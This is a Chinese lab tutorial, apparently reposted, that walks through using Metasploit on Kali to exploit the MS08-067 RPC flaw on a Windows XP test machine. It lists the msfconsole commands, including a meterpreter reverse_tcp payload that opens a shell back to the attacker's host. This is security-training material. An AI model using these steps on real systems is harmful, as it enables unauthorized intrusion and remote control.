kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)
kali利用msf工具對ms08-067漏洞入侵靶機(win xp2)
漏洞簡介
MS08-067漏洞將會影響Windows 2000/XP/Server 2003/Vista/Server 2008的各個版本,甚至還包括測試階段的Windows 7 Pro-Beta。
如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證即可利用此漏洞運行任意代碼。 此漏洞可能用于進行蠕蟲攻擊。 防火墻最佳做法和標準的默認防火墻配置有助于保護網絡資源免受從企業外部發起的攻擊。
實驗環境:
工具:metasploit
靶機兩臺:windows?xp2和kali2020
攻擊機的IP(kali):192.168.29.133
靶機IP(xp2): ?192.168.29.134
實驗條件:兩臺機子可以互通的,并且windows?xp2(需打開445端口,默認為打開)開啟了445端口,防火墻是關閉的。
步驟:
(1)在kali終端輸入msfconsole,啟動Metasploit工具
(2)輸入命令search ??ms08_067,查找關于ms08_067的漏洞模塊。
(3)輸入如下命令,使用該漏洞模塊
(4)進入這個模塊后,用show options?查看該模塊需要配置的參數
(5)設置配置項(show options)
設置靶機IP(xp2)set RHOST 192.168.29.134
設置要執行的payload:?set payload windows/meterpreter/reverse_tcp
設置攻擊機的IP(kali):set LHOST 192.168.29.133
設置要攻擊的目標操作系統類型:set target 34
用show options查看相關參數是否配置正確
6)最后,輸入exploit,回車運行,進入到特殊的payload---meterpreter,該payload在控制靶機之后,能夠對靶機執行更多的滲透攻擊。用 pwd查看靶機當前的工作路徑,用ipconfig命令查看靶機的IP地址配置。
總結
以上是生活随笔為你收集整理的kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: kail利用msf工具对ms17-010
- 下一篇: CSDN转载别人文章的操作